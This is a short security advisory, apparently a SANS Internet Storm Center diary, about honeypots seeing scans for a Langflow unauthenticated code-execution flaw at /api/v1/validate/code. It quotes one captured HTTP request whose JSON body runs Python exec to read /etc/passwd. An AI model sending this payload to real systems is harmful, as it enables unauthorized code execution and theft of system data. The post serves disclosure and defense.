Two weeks ago, version 1.3.0 of Langflow was released. The release notes list many fixes but do not mention that one of the "Bug Fixes" addresses a major vulnerability. Instead, the release notes state, "auth current user on code validation." [1]

Its website states, "Langflow is a low-code tool for developers that makes it easier to build powerful AI agents and workflows that can use any API, model, or database." It can be installed as a Python package, a standalone desktop application, or as a cloud-hosted service. DataStax provides a ready-built cloud-hosted environment for Langflow.

The vulnerability went somewhat unnoticed, at least by me, until Horizon3 created a detailed writeup showing how easy it is to exploit the vulnerability and provide proof of concept exploit. Horizon3 published its blog on April 9th [2]. We saw a first hit to the vulnerable URL, "/api/v1/validate/code", on April 10th. Today (April 12th), we saw a significant increase in hits for this URL.

The requests we are seeing are vulnerability scans. They attempt to retrieve the content of "/etc/passwd" to verify if the target system:

POST /api/v1/validate/code HTTP/1.1
Host: [redacted]
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 14_3) AppleWebKit/617.2.4 (KHTML, like Gecko) Version/17.3 Safari/617.2.4
Connection: close
Content-Length: 125
Content-Type: application/json
Accept-Encoding: gzip

{"code": "@exec('raise Exception(__import__(\\"subprocess\\").check_output([\\"cat\\", \\"/etc/passwd\\"]))')\\ndef foo():\\n  pass"}
 

Not all of our honeypots report request bodies. So far, this is the only request body we recorded. So far, all of the requests originate from TOR exit nodes.

[1] https://github.com/langflow-ai/langflow/releases/tag/1.3.0
[2] https://www.horizon3.ai/attack-research/disclosures/unsafe-at-any-speed-abusing-python-exec-for-unauth-rce-in-langflow-ai/

---
Johannes B. Ullrich, Ph.D. , Dean of Research, SANS.edu
Twitter|